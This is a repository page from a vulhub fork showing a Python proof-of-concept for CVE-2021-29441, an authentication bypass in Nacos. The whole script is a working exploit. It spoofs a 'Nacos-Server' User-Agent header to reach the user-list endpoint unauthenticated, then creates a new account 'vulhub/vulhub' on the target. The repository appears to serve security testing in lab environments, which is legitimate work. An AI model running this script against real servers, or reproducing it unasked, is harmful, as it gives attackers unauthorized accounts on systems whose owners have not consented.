aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/nacos/CVE-2021-29441/poc.py
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00

41 lines
1.1 KiB
Python
Raw Permalink Blame History

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import requests
headers = {
"User-Agent": "Nacos-Server"
}
def check(target):
endpoint = "/nacos/v1/auth/users?pageNo=1&pageSize=9"
r = requests.get(target.strip("/") + endpoint, headers=headers)
if r.status_code == 200 and "pageItems" in r.text:
print target + " has vulnerabilities"
return True
print target + "has not vulnerabilities"
return False
def add_user(target):
add_user_endpoint = "/nacos/v1/auth/users?username=vulhub&password=vulhub"
r = requests.post(target.strip("/") + add_user_endpoint, headers=headers)
if r.status_code == 200 and "create user ok" in r.text:
print "Add User Success"
print "New User Info: vulhub/vulhub"
print "Nacos Login Endpoint: {}/nacos/".format(target)
exit(1)
print "Add User Failed"
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Please specify the target: python poc.py http://xxxxx:8848"
exit(-1)
if check(sys.argv[1]):
add_user(sys.argv[1])
Reference in New Issue View Git Blame Copy Permalink